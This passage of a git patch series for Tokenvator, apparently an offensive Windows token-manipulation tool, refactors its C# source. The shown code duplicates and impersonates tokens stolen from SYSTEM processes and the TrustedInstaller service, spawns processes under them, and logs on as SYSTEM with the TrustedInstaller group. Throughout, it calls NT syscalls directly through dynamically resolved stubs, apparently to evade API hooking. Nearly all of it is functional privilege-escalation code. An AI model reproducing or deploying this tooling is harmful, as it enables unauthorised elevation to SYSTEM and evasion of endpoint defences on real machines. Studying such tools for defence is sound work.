             MonkeyWorks.ntdll.NtQueryInformationToken fSyscallNtQueryInformationToken = (MonkeyWorks.ntdll.NtQueryInformationToken)Marshal.GetDelegateForFunctionPointer(hNtQueryInformationToken, typeof(MonkeyWorks.ntdll.NtQueryInformationToken));
 
             IntPtr tokenInformation = IntPtr.Zero;
diff --git a/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs b/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs
index 3fe77ee..3da6f2f 100644
--- a/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs
+++ b/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs
@@ -576,7 +576,11 @@ public bool SetTokenSessionId(int sessionId)
         {
             bool exists, enabled;
             SetWorkingTokenToSelf();
-            TokenInformation.CheckTokenPrivilege(hWorkingToken, Winnt.SE_TCB_NAME, out exists, out enabled);
+
+            using (TokenInformation ti = new TokenInformation(hWorkingToken))
+            {
+                ti.CheckTokenPrivilege(Winnt.SE_TCB_NAME, out exists, out enabled);
+            }
 
             if (!exists)
             {
diff --git a/Tokenvator/Plugins/Enumeration/DesktopACL.cs b/Tokenvator/Plugins/Enumeration/DesktopACL.cs
index 0587c2c..fa6b5de 100644
--- a/Tokenvator/Plugins/Enumeration/DesktopACL.cs
+++ b/Tokenvator/Plugins/Enumeration/DesktopACL.cs
@@ -221,15 +221,6 @@ public static extern bool CreateWellKnownSid(
             ref uint cbSid
         );
 
-        public struct _ACL
-        {
-            byte AclRevision;
-            byte Sbz1;
-            short AclSize;
-            short AceCount;
-            short Sbz2;
-        }
-
         public enum _MULTIPLE_TRUSTEE_OPERATION
         {
             NO_MULTIPLE_TRUSTEE,
diff --git a/Tokenvator/Plugins/NamedPipes/NamedPipes.cs b/Tokenvator/Plugins/NamedPipes/NamedPipes.cs
index 2a247cd..2f7e5be 100644
--- a/Tokenvator/Plugins/NamedPipes/NamedPipes.cs
+++ b/Tokenvator/Plugins/NamedPipes/NamedPipes.cs
@@ -1,7 +1,6 @@
 using System;
 using System.IO;
 using System.IO.Pipes;
-using System.Runtime.InteropServices;
 using System.Security.AccessControl;
 using System.Threading;
 
@@ -69,9 +68,9 @@ private static bool _GetSystem()
         {
             string pipename = PSExec.GenerateUuid(12);
 
-            Thread thread = new Thread(() => _GetPipeToken(BASE_DIRECTORY + pipename));
+            Thread thread = new Thread(() => _GetPipeToken(pipename));
 
-            using (PSExec psExec = new PSExec("Tokenvator"))
+            using (PSExec psExec = new PSExec())
             {
                 if (!psExec.Connect("."))
                 {

From c2c1a2da7c76952795d508ce292525f3e1b1d48f Mon Sep 17 00:00:00 2001
From: Alexander <1656007+0xbadjuju@users.noreply.github.com>
Date: Fri, 27 Aug 2021 11:04:08 -0500
Subject: [PATCH 09/36] Set GetTrustedInstaller default to use LogonUserExExW
 and code cleanup

---
 Tokenvator/MainLoop.Modules.cs                |  89 ++++---
 .../Plugins/AccessTokens/AccessTokens.cs      | 123 +++++----
 .../Plugins/AccessTokens/CreateTokens.cs      |  29 +-
 .../Plugins/AccessTokens/TokenInformation.cs  |   6 +
 .../Plugins/AccessTokens/TokenManipulation.cs | 248 ++++++++----------
 Tokenvator/Resources/CommandLineParsing.cs    |  15 +-
 Tokenvator/Resources/TabComplete.cs           |   2 +-
 7 files changed, 269 insertions(+), 243 deletions(-)

diff --git a/Tokenvator/MainLoop.Modules.cs b/Tokenvator/MainLoop.Modules.cs
index a6092b8..b15d292 100644
--- a/Tokenvator/MainLoop.Modules.cs
+++ b/Tokenvator/MainLoop.Modules.cs
@@ -148,38 +148,6 @@ private static void _ClearDesktopACL()
             }
         }
 
-        ////////////////////////////////////////////////////////////////////////////////
-        //
-        ////////////////////////////////////////////////////////////////////////////////
-        private static void _CloneToken(bool remote, int processID, string command, IntPtr hToken)
-        {
-            if (!remote)
-            {
-                Console.WriteLine("[-] Unable to identify Process ID");
-                return;
-            }
-
-            if (!string.IsNullOrEmpty(command))
-                if (!remote)
-                    Console.WriteLine("[-] Unable to parse {0}", command);
-
-            using (TokenManipulation t = new TokenManipulation(hToken))
-            {
-                if (!t.OpenProcessToken(processID))
-                    return;
-                t.SetWorkingTokenToRemote();
-                if (!t.DuplicateToken(Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityDelegation))
-                {
-                    Console.WriteLine("[-] Unable to Duplicate with Delegation, attempting Impersonation");
-                    if (!t.DuplicateToken(Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation))
-                        return;
-                }
-
-                if (!t.AssignPrimaryToken())
-                    return;
-            }
-        }
-
         ////////////////////////////////////////////////////////////////////////////////
         //
         ////////////////////////////////////////////////////////////////////////////////
@@ -320,10 +288,55 @@ private static void _GetSystem(CommandLineParsing cLP, IntPtr hToken)
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // Starts Windows Module Installer and impersonates or starts a process with 
-        // the cloned token. There are better ways of doing this net .O
+        /// <summary>
+        /// Delegates out to _GetTrustedInstallerLogon and _GetTrustedInstallerService
+        /// </summary>
+        /// <param name="cLP"></param>
+        /// <param name="hToken"></param>
         ////////////////////////////////////////////////////////////////////////////////
         private static void _GetTrustedInstaller(CommandLineParsing cLP, IntPtr hToken)
+        {
+            if (cLP.Legacy)
+            {
+                _GetTrustedInstallerService(cLP, hToken);
+            }
+            else
+            {
+                _GetTrustedInstallerLogon(cLP, hToken);
+            }
+        }
+
+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// Calls LogonUserExExW with NT SERVICE\TrustedInstaller listed as a group
+        /// </summary>
+        /// <param name="cLP"></param>
+        /// <param name="hToken"></param>
+        ////////////////////////////////////////////////////////////////////////////////
+        private static void _GetTrustedInstallerLogon(CommandLineParsing cLP, IntPtr hToken)
+        {
+            using (TokenManipulation t = new TokenManipulation(hToken))
+            {
+                t.LogonUser(
+                    "NT AUTHORITY", 
+                    "SYSTEM", 
+                    string.Empty, 
+                    "NT SERVICE\\TrustedInstaller",
+                     Winbase.LOGON_TYPE.LOGON32_LOGON_SERVICE, 
+                     cLP.Command, 
+                     cLP.Arguments
+                );
+            }
+        }
+
+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// Starts Windows Module Installer and impersonates or starts a process with 
+        /// </summary>
+        /// <param name="cLP"></param>
+        /// <param name="hToken"></param>
+        ////////////////////////////////////////////////////////////////////////////////
+        private static void _GetTrustedInstallerService(CommandLineParsing cLP, IntPtr hToken)
         {
             bool exists, enabled;
             using (TokenInformation ti = new TokenInformation(hToken))
@@ -632,6 +645,7 @@ private static void _LogonUser(CommandLineParsing cLP, IntPtr hToken)
                 username = split.LastOrDefault();
                 if (!cLP.GetData("password", out password))
                 {
+                    Console.WriteLine("[-] Password Not Set");
                     return;
                 }
                 Console.WriteLine("User Logon");
@@ -641,8 +655,8 @@ private static void _LogonUser(CommandLineParsing cLP, IntPtr hToken)
                 string[] split = username.Split('\\').ToArray();
                 username = split.LastOrDefault();
                 logonType = Winbase.LOGON_TYPE.LOGON32_LOGON_SERVICE;
+                Console.WriteLine("[*] Setting Logon Type to Serivce");
                 domain = "NT SERVICE";
-                Console.WriteLine("Service Logon");
             }
             else
             {
@@ -652,16 +666,19 @@ private static void _LogonUser(CommandLineParsing cLP, IntPtr hToken)
                         username = "LocalService";
                         logonType = Winbase.LOGON_TYPE.LOGON32_LOGON_SERVICE;
                         domain = "NT AUTHORITY";
+                        Console.WriteLine("[*] Setting Logon Type to Serivce");
                         break;
                     case "localsystem":
-                        username = "LocalSystem";
+                        username = "SYSTEM";//"LocalSystem";
                         logonType = Winbase.LOGON_TYPE.LOGON32_LOGON_SERVICE;
                         domain = "NT AUTHORITY";
+                        Console.WriteLine("[*] Setting Logon Type to Serivce");
                         break;
                     case "networkservice":
                         username = "Network Service";
                         logonType = Winbase.LOGON_TYPE.LOGON32_LOGON_SERVICE;
                         domain = "NT AUTHORITY";
+                        Console.WriteLine("[*] Setting Logon Type to Serivce");
                         break;
                     default:
                         cLP.GetData("password", out password);
diff --git a/Tokenvator/Plugins/AccessTokens/AccessTokens.cs b/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
index b13d517..d14bc5b 100644
--- a/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
+++ b/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
@@ -6,7 +6,7 @@
 using Tokenvator.Plugins.Execution;
 
 using MonkeyWorks.Unmanaged.Headers;
-using MonkeyWorks.Unmanaged.Libraries;
+//using MonkeyWorks.Unmanaged.Libraries;
 
 using DInvoke.DynamicInvoke;
 
@@ -109,6 +109,64 @@ public IntPtr GetWorkingToken()
         }
         #endregion
 
+        ////////////////////////////////////////////////////////////////////////////////
+        // Move to access tokens - have Impersonate user use this
+        ////////////////////////////////////////////////////////////////////////////////
+        public bool DuplicateToken(Winnt._SECURITY_IMPERSONATION_LEVEL impersonationLevel)
+        {
+            IntPtr hNtDuplicateToken = Generic.GetSyscallStub("NtDuplicateToken");
+            MonkeyWorks.ntdll.NtDuplicateToken fSyscallNtDuplicateToken = (MonkeyWorks.ntdll.NtDuplicateToken)Marshal.GetDelegateForFunctionPointer(hNtDuplicateToken, typeof(MonkeyWorks.ntdll.NtDuplicateToken));
+
+            uint ntRetVal = 0;
+
+            Winnt._SECURITY_QUALITY_OF_SERVICE securityContextTrackingMode = new Winnt._SECURITY_QUALITY_OF_SERVICE()
+            {
+                Length = (uint)Marshal.SizeOf(typeof(Winnt._SECURITY_QUALITY_OF_SERVICE)),
+                ImpersonationLevel = Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation,//SecurityAnonymous
+                ContextTrackingMode = Winnt.SECURITY_CONTEXT_TRACKING_MODE.SECURITY_STATIC_TRACKING,
+                EffectiveOnly = Winnt.EFFECTIVE_ONLY.False
+            };
+
+            IntPtr hSecurityContextTrackingMode = Marshal.AllocHGlobal(Marshal.SizeOf(securityContextTrackingMode));
+            Marshal.StructureToPtr(securityContextTrackingMode, hSecurityContextTrackingMode, false);
+
+            wudfwdm._OBJECT_ATTRIBUTES objectAttributes = new wudfwdm._OBJECT_ATTRIBUTES()
+            {
+                Length = (uint)Marshal.SizeOf(typeof(wudfwdm._OBJECT_ATTRIBUTES)),
+                RootDirectory = IntPtr.Zero,
+                Attributes = 0,
+                ObjectName = IntPtr.Zero,
+                SecurityDescriptor = IntPtr.Zero,
+                SecurityQualityOfService = hSecurityContextTrackingMode
+            };
+
+            GCHandle hObjectAttributes = GCHandle.Alloc(objectAttributes, GCHandleType.Pinned);
+
+            try
+            {
+                ntRetVal = fSyscallNtDuplicateToken(hWorkingToken, (uint)Winnt.ACCESS_MASK.MAXIMUM_ALLOWED, hObjectAttributes.AddrOfPinnedObject(), false, Winnt._TOKEN_TYPE.TokenImpersonation, ref phNewToken);
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] NtDuplicateToken Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+                return false;
+            }
+            finally
+            {
+                hObjectAttributes.Free();
+            }
+
+            if (0 != ntRetVal)
+            {
+                Misc.GetNtError("NtDuplicateToken", ntRetVal);
+                return false;
+            }
+
+            Console.WriteLine(" [+] Duplicate Token Handle: 0x{0}", phNewToken.ToString("X4"));
+            return true;
+        }
+
         ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
         /// Opens a process Token
@@ -385,11 +443,13 @@ public bool StartProcessAsUser(string newProcess)
             return true;
         }
 
+        ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
         /// Impersonates the token from a specified processId
         /// Converted to D/Invoke Syscalls - still uses kernel32.GetCurrentThread()
         /// </summary>
         /// <returns></returns>
+        ////////////////////////////////////////////////////////////////////////////////
         [SecurityCritical]
         [HandleProcessCorruptedStateExceptions]
         public virtual bool ImpersonateUser()
@@ -399,56 +459,7 @@ public virtual bool ImpersonateUser()
             // Winbase._SECURITY_ATTRIBUTES securityAttributes = new Winbase._SECURITY_ATTRIBUTES();
             // advapi32.DuplicateTokenEx(hWorkingToken, (uint)Winnt.ACCESS_MASK.MAXIMUM_ALLOWED, ref securityAttributes, Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation, Winnt._TOKEN_TYPE.TokenPrimary, out phNewToken)
             ////////////////////////////////////////////////////////////////////////////////
-            IntPtr hNtDuplicateToken = Generic.GetSyscallStub("NtDuplicateToken");
-            MonkeyWorks.ntdll.NtDuplicateToken fSyscallNtDuplicateToken = (MonkeyWorks.ntdll.NtDuplicateToken)Marshal.GetDelegateForFunctionPointer(hNtDuplicateToken, typeof(MonkeyWorks.ntdll.NtDuplicateToken));
-
-            uint ntRetVal = 0;
-
-            Winnt._SECURITY_QUALITY_OF_SERVICE securityContextTrackingMode = new Winnt._SECURITY_QUALITY_OF_SERVICE()
-            {
-                Length = (uint)Marshal.SizeOf(typeof(Winnt._SECURITY_QUALITY_OF_SERVICE)),
-                ImpersonationLevel = Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation,//SecurityAnonymous
-                ContextTrackingMode = Winnt.SECURITY_CONTEXT_TRACKING_MODE.SECURITY_STATIC_TRACKING,
-                EffectiveOnly = Winnt.EFFECTIVE_ONLY.False
-            };
-
-            IntPtr hSecurityContextTrackingMode = Marshal.AllocHGlobal(Marshal.SizeOf(securityContextTrackingMode));
-            Marshal.StructureToPtr(securityContextTrackingMode, hSecurityContextTrackingMode, false);
-
-            wudfwdm._OBJECT_ATTRIBUTES objectAttributes = new wudfwdm._OBJECT_ATTRIBUTES()
-            {
-                Length = (uint)Marshal.SizeOf(typeof(wudfwdm._OBJECT_ATTRIBUTES)),
-                RootDirectory = IntPtr.Zero,
-                Attributes = 0,
-                ObjectName = IntPtr.Zero,
-                SecurityDescriptor = IntPtr.Zero,
-                SecurityQualityOfService = hSecurityContextTrackingMode
-            };
-
-            GCHandle hObjectAttributes = GCHandle.Alloc(objectAttributes, GCHandleType.Pinned);
-
-            try
-            {
-                ntRetVal = fSyscallNtDuplicateToken(hWorkingToken, (uint)Winnt.ACCESS_MASK.MAXIMUM_ALLOWED, hObjectAttributes.AddrOfPinnedObject(), false, Winnt._TOKEN_TYPE.TokenImpersonation, ref phNewToken);
-            }
-            catch (Exception ex)
-            {
-                Console.WriteLine("[-] NtDuplicateToken Generated an Exception");
-                Console.WriteLine("[-] {0}", ex.Message);
-                return false;
-            }
-            finally
-            {
-                hObjectAttributes.Free();
-            }
-
-            if (0 != ntRetVal)
-            {
-                Misc.GetNtError("NtOpenProcessToken", ntRetVal);
-                return false;
-            }
-
-            Console.WriteLine(" [+] Duplicate Token Handle: 0x{0}", phNewToken.ToString("X4"));
+            DuplicateToken(Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation);
 
             ////////////////////////////////////////////////////////////////////////////////
             // Impersonate a newly duplicated token
@@ -458,9 +469,13 @@ public virtual bool ImpersonateUser()
             IntPtr hNtSetInformationThread = Generic.GetSyscallStub("NtSetInformationThread");
             MonkeyWorks.ntdll.NtSetInformationThread fSyscallNtSetInformationThread = (MonkeyWorks.ntdll.NtSetInformationThread)Marshal.GetDelegateForFunctionPointer(hNtSetInformationThread, typeof(MonkeyWorks.ntdll.NtSetInformationThread));
 
-            //If I get bored I can switch this over
-            IntPtr hThread = kernel32.GetCurrentThread();
+            IntPtr hkernel32 = Generic.GetPebLdrModuleEntry("kernel32.dll");
+            IntPtr hGetCurrentThread = Generic.GetExportAddress(hkernel32, "GetCurrentThread");
+            MonkeyWorks.kernel32.GetCurrentThread fGetCurrentThread = (MonkeyWorks.kernel32.GetCurrentThread)Marshal.GetDelegateForFunctionPointer(hGetCurrentThread, typeof(MonkeyWorks.kernel32.GetCurrentThread));
+
+            IntPtr hThread = fGetCurrentThread();
 
+            uint ntRetVal = 0;
             try
             {
                ntRetVal = fSyscallNtSetInformationThread(hThread, MonkeyWorks.ntdll._THREAD_INFORMATION_CLASS.ThreadImpersonationToken, ref phNewToken, (uint)Marshal.SizeOf(phNewToken));
@@ -487,12 +502,14 @@ public virtual bool ImpersonateUser()
             return true;
         }
 
+        ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
         /// Closes an handle
         /// Converted to D/Invoke Syscalls
         /// </summary>
         /// <param name="handle"></param>
         /// <returns></returns>
+        ////////////////////////////////////////////////////////////////////////////////
         protected bool CloseHandle(IntPtr handle)
         {
             MonkeyWorks.ntdll.NtClose fSyscallhNtClose = (MonkeyWorks.ntdll.NtClose)Marshal.GetDelegateForFunctionPointer(hNtClose, typeof(MonkeyWorks.ntdll.NtClose));
diff --git a/Tokenvator/Plugins/AccessTokens/CreateTokens.cs b/Tokenvator/Plugins/AccessTokens/CreateTokens.cs
index e004d20..2fd7244 100644
--- a/Tokenvator/Plugins/AccessTokens/CreateTokens.cs
+++ b/Tokenvator/Plugins/AccessTokens/CreateTokens.cs
@@ -435,8 +435,6 @@ ref localTotalEntriesRead
             if (0 != ntRetVal)
             {
                 Misc.GetNtError("NetUserGetLocalGroups", ntRetVal);
-                Misc.GetNtError("[-] {0}", ntRetVal);
-                //return false;
             }
 
             localgroupUserInfo = new lmaccess._LOCALGROUP_USERS_INFO_0[localEntriesRead];
@@ -452,7 +450,6 @@ ref localTotalEntriesRead
             #endregion
 
             #region NetUserGetGroups
-            //Console.WriteLine(" - NetUserGetGroups");
             lmaccess._GROUP_USERS_INFO_0[] globalGroupUserInfo;// = new lmaccess._GROUP_USERS_INFO_0[0];
             ntRetVal = netapi32.NetUserGetGroups(
                 domain,
@@ -467,8 +464,6 @@ ref globalEotalEntriesRead
             if (0 != ntRetVal)
             {
                 Misc.GetNtError("NetUserGetGroups", ntRetVal);
-                Misc.GetNtError("[-] {0}", ntRetVal);
-                //return false;
             }
 
             globalGroupUserInfo = new lmaccess._GROUP_USERS_INFO_0[globalEntriesRead];
@@ -485,6 +480,8 @@ ref globalEotalEntriesRead
 
             #region Default Admin Entries
 
+            Console.WriteLine("[+] Default Admin Entries: {0}");
+
             uint groupsAttributes = (uint)(Winnt.SE_GROUP_ENABLED | Winnt.SE_GROUP_ENABLED_BY_DEFAULT | Winnt.SE_GROUP_MANDATORY);
 
             /*
@@ -537,6 +534,9 @@ ref globalEotalEntriesRead
             #endregion
 
             #region Custom Groups
+
+            Console.WriteLine("[+] Custom Entries: {0}");
+
             //Custom groups
             foreach (string group in groups)
             {
@@ -548,9 +548,17 @@ ref globalEotalEntriesRead
                     d = split[0];
                     groupname = split[1];
                 }
-                string sid = new NTAccount(d, groupname).Translate(typeof(SecurityIdentifier)).Value;
-                InitializeSid(sid, ref tokenGroups.Groups[extraGroups].Sid);
-                tokenGroups.Groups[extraGroups++].Attributes = groupsAttributes;
+
+                try
+                {
+                    string sid = new NTAccount(d, groupname).Translate(typeof(SecurityIdentifier)).Value;
+                    InitializeSid(sid, ref tokenGroups.Groups[extraGroups].Sid);
+                    tokenGroups.Groups[extraGroups++].Attributes = groupsAttributes;
+                }
+                catch (IdentityNotMappedException ex)
+                {
+                    Console.WriteLine(ex.Message);
+                }
             }
             #endregion
 
@@ -901,10 +909,9 @@ public static bool InitializeSid(string sddl, ref IntPtr psid)
             string accountName = string.Empty;
             try
             {
-                accountName = new System.Security.Principal.SecurityIdentifier(sddl)
-                    .Translate(typeof(System.Security.Principal.NTAccount)).ToString();
+                accountName = new SecurityIdentifier(sddl).Translate(typeof(NTAccount)).ToString();
             }
-            catch (System.Security.Principal.IdentityNotMappedException ex)
+            catch (IdentityNotMappedException ex)
             {
                 Console.WriteLine(ex.Message);
             }
diff --git a/Tokenvator/Plugins/AccessTokens/TokenInformation.cs b/Tokenvator/Plugins/AccessTokens/TokenInformation.cs
index b4f434a..691866b 100644
--- a/Tokenvator/Plugins/AccessTokens/TokenInformation.cs
+++ b/Tokenvator/Plugins/AccessTokens/TokenInformation.cs
@@ -31,6 +31,12 @@ class TokenInformation : AccessTokens
 
         private readonly IntPtr hNtQueryInformationToken;
 
+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// Default Constructor
+        /// </summary>
+        /// <param name="hToken"></param>
+        ////////////////////////////////////////////////////////////////////////////////
         public TokenInformation(IntPtr hToken) : base(hToken)
         {
             hNtQueryInformationToken = Generic.GetSyscallStub("NtQueryInformationToken");
diff --git a/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs b/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs
index 3da6f2f..b8ba92f 100644
--- a/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs
+++ b/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs
@@ -5,17 +5,20 @@
 using System.Security.Principal;
 using System.Text;
 
+using DInvoke.DynamicInvoke;
+
 using Tokenvator.Resources;
 using Tokenvator.Plugins.Enumeration;
 using Tokenvator.Plugins.Execution;
 
-
 using MonkeyWorks.Unmanaged.Headers;
 using MonkeyWorks.Unmanaged.Libraries;
 
 
 namespace Tokenvator.Plugins.AccessTokens
 {
+    using MonkeyWorks = MonkeyWorks.Unmanaged.Libraries.DInvoke;
+
     partial class TokenManipulation : AccessTokens
     {
         private Dictionary<uint, string> processes;
@@ -34,7 +37,10 @@ partial class TokenManipulation : AccessTokens
             "SeUndockPrivilege", "SeUnsolicitedInputPrivilege" };
 
         ////////////////////////////////////////////////////////////////////////////////
-        // Default Constructor
+        /// <summary>
+        /// Default Constructor
+        /// </summary>
+        /// <param name="currentProcessToken"></param>
         ////////////////////////////////////////////////////////////////////////////////
         internal TokenManipulation(IntPtr currentProcessToken) : base(currentProcessToken)
         {
@@ -42,15 +48,19 @@ internal TokenManipulation(IntPtr currentProcessToken) : base(currentProcessToke
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // IDisposable
+        /// <summary>
+        /// IDisposable to free the allocated pointers
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
-        public new void Dispose()
+        public override void Dispose()
         {
             base.Dispose();
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // Default Destructor
+        /// <summary>
+        /// Default destructor
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
         ~TokenManipulation()
         {
@@ -58,39 +68,20 @@ internal TokenManipulation(IntPtr currentProcessToken) : base(currentProcessToke
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // Assigns a token to a process
+        /// <summary>
+        /// Should be able to replace with a single syscall
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
-        public bool AssignPrimaryToken()
+        public void DisableAndRemoveAllTokenPrivileges()
         {
-            ntdll._PROCESS_ACCESS_TOKEN processAccessToken = new ntdll._PROCESS_ACCESS_TOKEN
-            {
-                hToken = phNewToken,
-                hThread = IntPtr.Zero
-            };
+            IntPtr hNtAdjustPrivilegesToken = Generic.GetSyscallStub("NtAdjustPrivilegesToken");
+            MonkeyWorks.ntdll.NtAdjustPrivilegesToken fSyscallNtAdjustPrivilegesToken = (MonkeyWorks.ntdll.NtAdjustPrivilegesToken)Marshal.GetDelegateForFunctionPointer(hNtAdjustPrivilegesToken, typeof(MonkeyWorks.ntdll.NtAdjustPrivilegesToken));
 
-            uint status = ntdll.NtSetInformationProcess(
-                kernel32.GetCurrentProcess(),
-                ntdll._PROCESS_INFORMATION_CLASS.ProcessAccessToken,
-                ref processAccessToken,
-                (uint)Marshal.SizeOf(typeof(ntdll._PROCESS_ACCESS_TOKEN))
-            );
+            Winnt._TOKEN_PRIVILEGES_ARRAY newTokenPrivileges = new Winnt._TOKEN_PRIVILEGES_ARRAY();
+            Winnt._TOKEN_PRIVILEGES_ARRAY previousTokenPrivileges = new Winnt._TOKEN_PRIVILEGES_ARRAY();
 
-            if (0 != status)
-            {
-                Misc.GetNtError("NtSetInformationProcess", status);
-                Console.WriteLine("[*] Is SeAssignPrimaryTokenPrivilege Enabled?");
-                return false;
-            }
-            Console.WriteLine("[+] Primary Token Assigned");
+            //fSyscallNtAdjustPrivilegesToken(hWorkingToken, true, );
 
-            return true;
-        }
-
-        ////////////////////////////////////////////////////////////////////////////////
-        // Prints the tokens privileges
-        ////////////////////////////////////////////////////////////////////////////////
-        public void DisableAndRemoveAllTokenPrivileges()
-        {
             ////////////////////////////////////////////////////////////////////////////////
             Console.WriteLine("[*] Enumerating Token Privileges");
             uint TokenInfLength = 0;
@@ -165,35 +156,13 @@ public void DisableAndRemoveAllTokenPrivileges()
             Console.WriteLine();
         }
 
-        ////////////////////////////////////////////////////////////////////////////////
-        //
-        ////////////////////////////////////////////////////////////////////////////////
-        public bool DuplicateToken(Winnt._SECURITY_IMPERSONATION_LEVEL impersonationLevel)
-        {
-            if (IntPtr.Zero == hExistingToken)
-                return false;
-
-            Winbase._SECURITY_ATTRIBUTES securityAttributes = new Winbase._SECURITY_ATTRIBUTES();
-            if (!advapi32.DuplicateTokenEx(
-                        hWorkingToken,
-                        (uint)Winnt.ACCESS_MASK.MAXIMUM_ALLOWED,
-                        ref securityAttributes,
-                        impersonationLevel,
-                        Winnt._TOKEN_TYPE.TokenImpersonation,
-                        out phNewToken
-            ))
-            {
-                Misc.GetWin32Error("DuplicateTokenEx: ");
-                return false;
-            }
-
-            Console.WriteLine(" [+] Duplicate Token Handle: 0x{0}", phNewToken.ToString("X4"));
-            return true;
-        }
-
         #region Privilege Escalations
         ////////////////////////////////////////////////////////////////////////////////
-        // Creates a new process as SYSTEM
+        /// <summary>
+        /// Starts a process with a duplicated SYSTEM Token
+        /// No conversions required
+        /// </summary>
+        /// <returns></returns>
         ////////////////////////////////////////////////////////////////////////////////
         public bool GetSystem(string newProcess)
         {
@@ -205,17 +174,19 @@ public bool GetSystem(string newProcess)
 
             foreach (uint process in processes.Keys)
             {
-                if (OpenProcessToken((int)process))
+                if (!OpenProcessToken((int)process))
+                {
+                    continue;
+                }
+
+                SetWorkingTokenToRemote();
+
+                if (DuplicateToken(Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation))
                 {
-                    Console.WriteLine(" [+] Opened {0}", process);
-                    SetWorkingTokenToRemote();
-                    if (DuplicateToken(Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation))
+                    SetWorkingTokenToNewToken();
+                    if (StartProcessAsUser(newProcess))
                     {
-                        SetWorkingTokenToNewToken();
-                        if (StartProcessAsUser(newProcess))
-                        {
-                            return true;
-                        }
+                        return true;
                     }
                 }
             }
@@ -225,7 +196,11 @@ public bool GetSystem(string newProcess)
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // Elevates current process to SYSTEM
+        /// <summary>
+        /// Impersonates a SYSTEM Token
+        /// No conversions required
+        /// </summary>
+        /// <returns></returns>
         ////////////////////////////////////////////////////////////////////////////////
         public bool GetSystem()
         {
@@ -237,26 +212,32 @@ public bool GetSystem()
 
             foreach (uint process in processes.Keys)
             {
-                if (OpenProcessToken((int)process))
+                if (!OpenProcessToken((int)process))
                 {
-                    SetWorkingTokenToRemote();
-                    Console.WriteLine(" [+] Opened {0}", process);
-                    SetWorkingTokenToRemote();
-                    if (ImpersonateUser())
-                    {
-                        return true;
-                    }
+                     continue;
+                }
+
+                SetWorkingTokenToRemote();
+
+                if (ImpersonateUser())
+                {
+                    return true;
                 }
             }
             return false;
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // Creates a process as SYSTEM w/ Trusted Installer Group
+        /// <summary>
+        /// Start a process as SYSTEM w/ Trusted Installer Group
+        /// No conversions required
+        /// </summary>
+        /// <returns></returns>
         ////////////////////////////////////////////////////////////////////////////////
         public bool GetTrustedInstaller(string newProcess)
         {
             Console.WriteLine("[+] Getting NT AUTHORITY\\SYSTEM privileges");
+            //This is required for duplicate token
             GetSystem();
             Console.WriteLine(" [*] Running as: {0}", WindowsIdentity.GetCurrent().Name);
 
@@ -269,7 +250,7 @@ public bool GetTrustedInstaller(string newProcess)
 
             if (!OpenProcessToken((int)services.GetServiceProcessId()))
             {
-                Misc.GetWin32Error("GetPrimaryToken");
+                Misc.GetWin32Error("OpenProcessToken");
                 return false;
             }
 
@@ -283,7 +264,7 @@ public bool GetTrustedInstaller(string newProcess)
             SetWorkingTokenToNewToken();
             if (!StartProcessAsUser(newProcess))
             {
-                Misc.GetWin32Error("DuplicateToken");
+                Misc.GetWin32Error("StartProcessAsUser");
                 return false;
             }
 
@@ -291,7 +272,11 @@ public bool GetTrustedInstaller(string newProcess)
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // Elevates current process to SYSTEM w/ Trusted Installer Group
+        /// <summary>
+        /// Impersonates a SYSTEM token w/ Trusted Installer Group
+        /// No conversions required
+        /// </summary>
+        /// <returns></returns>
         ////////////////////////////////////////////////////////////////////////////////
         public bool GetTrustedInstaller()
         {
@@ -306,21 +291,24 @@ public bool GetTrustedInstaller()
                 return false;
             }
 
-            if (OpenProcessToken((int)services.GetServiceProcessId()))
+            if (!OpenProcessToken((int)services.GetServiceProcessId()))
             {
-                SetWorkingTokenToRemote();
-                if (ImpersonateUser())
-                {
-                    return true;
-                }
+                return false;
             }
 
-            return false;
+            SetWorkingTokenToRemote();
+            if (!ImpersonateUser())
+            {
+                return false;
+            }
+
+            return true;
         }
         #endregion
 
         ////////////////////////////////////////////////////////////////////////////////
-        // 
+        // Should be a simple conversion
+        // Combine with lower function
         ////////////////////////////////////////////////////////////////////////////////
         public void LogonUser(string domain, string username, string password, Winbase.LOGON_TYPE logonType, string command, string arguments)
         {
@@ -357,58 +345,25 @@ public void LogonUser(string domain, string username, string password, Winbase.L
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // 
+        // Combine with above method
         ////////////////////////////////////////////////////////////////////////////////
         public void LogonUser(string domain, string username, string password, string groups, Winbase.LOGON_TYPE logonType, string command, string arguments)
         {
             SetWorkingTokenToSelf();
-            CreateTokens ct = new CreateTokens(hWorkingToken);
+
             Ntifs._TOKEN_GROUPS tokenGroups;
